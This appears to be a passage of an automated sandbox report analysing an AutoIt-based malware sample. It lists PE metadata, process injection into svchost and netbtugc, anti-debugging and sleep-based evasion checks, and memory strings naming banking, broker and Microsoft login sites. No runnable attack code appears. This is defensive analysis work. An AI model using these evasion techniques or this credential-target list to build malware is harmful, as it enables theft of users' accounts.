Source: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\netbtugc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\netbtugc.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe

Static file information: File size 1155584 > 1048576

Source: SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: lXlvzubPaBLtjusO.exe, 00000003.00000000.2195387708.0000000000E4E000.00000002.00000001.01000000.00000004.sdmp, lXlvzubPaBLtjusO.exe, 00000008.00000000.2351101955.0000000000E4E000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: wntdll.pdbUGP source: SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe, 00000000.00000003.2128199984.0000000003F40000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe, 00000000.00000003.2127928332.0000000004090000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2279822618.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2181745888.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2179891285.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2279822618.0000000003600000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2283353075.0000000003419000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2279743002.0000000003268000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4579692612.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4579692612.000000000375E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe, 00000000.00000003.2128199984.0000000003F40000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe, 00000000.00000003.2127928332.0000000004090000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2279822618.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2181745888.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2179891285.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2279822618.0000000003600000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000004.00000003.2283353075.0000000003419000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2279743002.0000000003268000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4579692612.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4579692612.000000000375E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000003.2242578092.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2279614138.0000000003000000.00000004.00000020.00020000.00000000.sdmp, lXlvzubPaBLtjusO.exe, 00000003.00000002.4576902587.0000000000C78000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: netbtugc.exe, 00000004.00000002.4580670219.0000000003BEC000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4576762013.000000000309E000.00000004.00000020.00020000.00000000.sdmp, lXlvzubPaBLtjusO.exe, 00000008.00000000.2351224393.00000000029EC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2567856733.0000000003E4C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: netbtugc.exe, 00000004.00000002.4580670219.0000000003BEC000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4576762013.000000000309E000.00000004.00000020.00020000.00000000.sdmp, lXlvzubPaBLtjusO.exe, 00000008.00000000.2351224393.00000000029EC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2567856733.0000000003E4C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000003.2242578092.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2279614138.0000000003000000.00000004.00000020.00020000.00000000.sdmp, lXlvzubPaBLtjusO.exe, 00000003.00000002.4576902587.0000000000C78000.00000004.00000020.00020000.00000000.sdmp

Source: SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe

Code function: 0_2_009DC304 LoadLibraryA,GetProcAddress,

0_2_009DC304

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: 0_2_00988B85 push ecx; ret	0_2_00988B98
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004048A9 push esp; ret	2_2_004048AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041E2BA push 00000038h; iretd	2_2_0041E2BE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A436 push ebx; iretd	2_2_0041A600
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00418C92 pushad ; retf	2_2_00418C93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A5D9 push ebx; iretd	2_2_0041A600
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004017E5 push ebp; retf 003Fh	2_2_004017E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00403780 push eax; ret	2_2_00403782
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004147A2 push es; iretd	2_2_004147AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0360225F pushad ; ret	2_2_036027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036027FA pushad ; ret	2_2_036027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036309AD push ecx; mov dword ptr [esp], ecx	2_2_036309B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0360283D push eax; iretd	2_2_03602858
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0360135F push eax; iretd	2_2_03601369
Source: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe	Code function: 3_2_05E70C8D push FFFFFFBAh; ret	3_2_05E70C8F
Source: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe	Code function: 3_2_05E65C41 push ebx; ret	3_2_05E65C42
Source: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe	Code function: 3_2_05E51EBE push esp; ret	3_2_05E51EBF
Source: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe	Code function: 3_2_05E6B8CF push 00000038h; iretd	3_2_05E6B8D3
Source: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe	Code function: 3_2_05E67BEE push ebx; iretd	3_2_05E67C15
Source: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe	Code function: 3_2_05E662A7 pushad ; retf	3_2_05E662A8
Source: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe	Code function: 3_2_05E67A4B push ebx; iretd	3_2_05E67C15
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_035C225F pushad ; ret	4_2_035C27F9
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_035C27FA pushad ; ret	4_2_035C27F9
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_035F09AD push ecx; mov dword ptr [esp], ecx	4_2_035F09B6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_035C283D push eax; iretd	4_2_035C2858
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00C32238 pushad ; iretd	4_2_00C32239
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00C3AB37 push 00000038h; iretd	4_2_00C3AB3B
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00C36CB3 push ebx; iretd	4_2_00C36E7D
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00C30EAB push ebp; retf	4_2_00C30EAC
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00C36E56 push ebx; iretd	4_2_00C36E7D
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00C3101F push es; iretd	4_2_00C31027

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: 0_2_00964A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_00964A35
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: 0_2_009E55FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_009E55FD

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe

Code function: 0_2_009833C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_009833C7

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0367096E rdtsc

2_2_0367096E

Source: C:\Windows\SysWOW64\netbtugc.exe	Window / User API: threadDelayed 3026			Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Window / User API: threadDelayed 6945			Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-100652

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	API coverage: 4.8 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\netbtugc.exe	API coverage: 2.6 %

Source: C:\Windows\SysWOW64\netbtugc.exe TID: 5676	Thread sleep count: 3026 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 5676	Thread sleep time: -6052000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 5676	Thread sleep count: 6945 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 5676	Thread sleep time: -13890000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe TID: 6136	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe TID: 6136	Thread sleep time: -45000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe TID: 6136	Thread sleep count: 35 > 30	Jump to behavior
Source: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe TID: 6136	Thread sleep time: -35000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\netbtugc.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\netbtugc.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: 0_2_009C4696 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_009C4696
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: 0_2_009CC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_009CC9C7
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: 0_2_009CC93C FindFirstFileW,FindClose,	0_2_009CC93C
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: 0_2_009CF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_009CF200
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: 0_2_009CF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_009CF35D
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: 0_2_009CF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_009CF65E
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: 0_2_009C3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_009C3A2B
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: 0_2_009C3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_009C3D4E
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: 0_2_009CBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_009CBF27
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00C3BAB0 FindFirstFileW,FindNextFileW,FindClose,	4_2_00C3BAB0

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe

Code function: 0_2_00964AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00964AFE

Source: F56GKLK7U4.4.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: F56GKLK7U4.4.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: F56GKLK7U4.4.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: netbtugc.exe, 00000004.00000002.4582982916.0000000007F07000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: blocklistVMware20,11696487552
Source: F56GKLK7U4.4.dr	Binary or memory string: discord.comVMware20,11696487552f
Source: F56GKLK7U4.4.dr	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: netbtugc.exe, 00000004.00000002.4582982916.0000000007F07000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ist test formVMware20,11696487552
Source: lXlvzubPaBLtjusO.exe, 00000008.00000002.4577012526.0000000000BEF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllT
Source: F56GKLK7U4.4.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: F56GKLK7U4.4.dr	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: F56GKLK7U4.4.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: F56GKLK7U4.4.dr	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: F56GKLK7U4.4.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: F56GKLK7U4.4.dr	Binary or memory string: global block list test formVMware20,11696487552
Source: netbtugc.exe, 00000004.00000002.4582982916.0000000007F07000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,116
Source: netbtugc.exe, 00000004.00000002.4582982916.0000000007F07000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: n PasswordVMware20,11696487552x
Source: F56GKLK7U4.4.dr	Binary or memory string: AMC password management pageVMware20,11696487552
Source: F56GKLK7U4.4.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: netbtugc.exe, 00000004.00000002.4576762013.000000000309E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2569276786.0000026BC3D4C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: netbtugc.exe, 00000004.00000002.4582982916.0000000007F07000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: l.comVMware20,11696487552h
Source: F56GKLK7U4.4.dr	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: F56GKLK7U4.4.dr	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: F56GKLK7U4.4.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: F56GKLK7U4.4.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: netbtugc.exe, 00000004.00000002.4582982916.0000000007F07000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: kers.comVMware20,11696487552}
Source: F56GKLK7U4.4.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: netbtugc.exe, 00000004.00000002.4582982916.0000000007F07000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,1
Source: F56GKLK7U4.4.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: F56GKLK7U4.4.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: netbtugc.exe, 00000004.00000002.4582982916.0000000007F07000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: x.intuit.comVMware20,11696487552t
Source: F56GKLK7U4.4.dr	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: F56GKLK7U4.4.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: F56GKLK7U4.4.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: F56GKLK7U4.4.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: F56GKLK7U4.4.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: netbtugc.exe, 00000004.00000002.4582982916.0000000007F07000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696487l
Source: F56GKLK7U4.4.dr	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: netbtugc.exe, 00000004.00000002.4582982916.0000000007F07000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware203
Source: F56GKLK7U4.4.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: F56GKLK7U4.4.dr	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: F56GKLK7U4.4.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: netbtugc.exe, 00000004.00000002.4582982916.0000000007F07000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pageVMware20,11696487552
Source: netbtugc.exe, 00000004.00000002.4582982916.0000000007F07000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,1169648"
Source: F56GKLK7U4.4.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: F56GKLK7U4.4.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	API call chain: ExitProcess graph end node			graph_0-99587
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	API call chain: ExitProcess graph end node			graph_0-99686

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0367096E rdtsc

2_2_0367096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00417823 LdrLoadDll,

2_2_00417823

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe

Code function: 0_2_009D41FD BlockInput,

0_2_009D41FD

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe

Code function: 0_2_00963B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00963B4C

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe

Code function: 0_2_00995CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00995CCC

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe

Code function: 0_2_009DC304 LoadLibraryA,GetProcAddress,

0_2_009DC304

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: 0_2_03E93550 mov eax, dword ptr fs:[00000030h]	0_2_03E93550
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: 0_2_03E934F0 mov eax, dword ptr fs:[00000030h]	0_2_03E934F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: 0_2_03E91ED0 mov eax, dword ptr fs:[00000030h]	0_2_03E91ED0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036D437C mov eax, dword ptr fs:[00000030h]	2_2_036D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]	2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]	2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]	2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]	2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]	2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]	2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]	2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]	2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]	2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]	2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]	2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]	2_2_036B2349
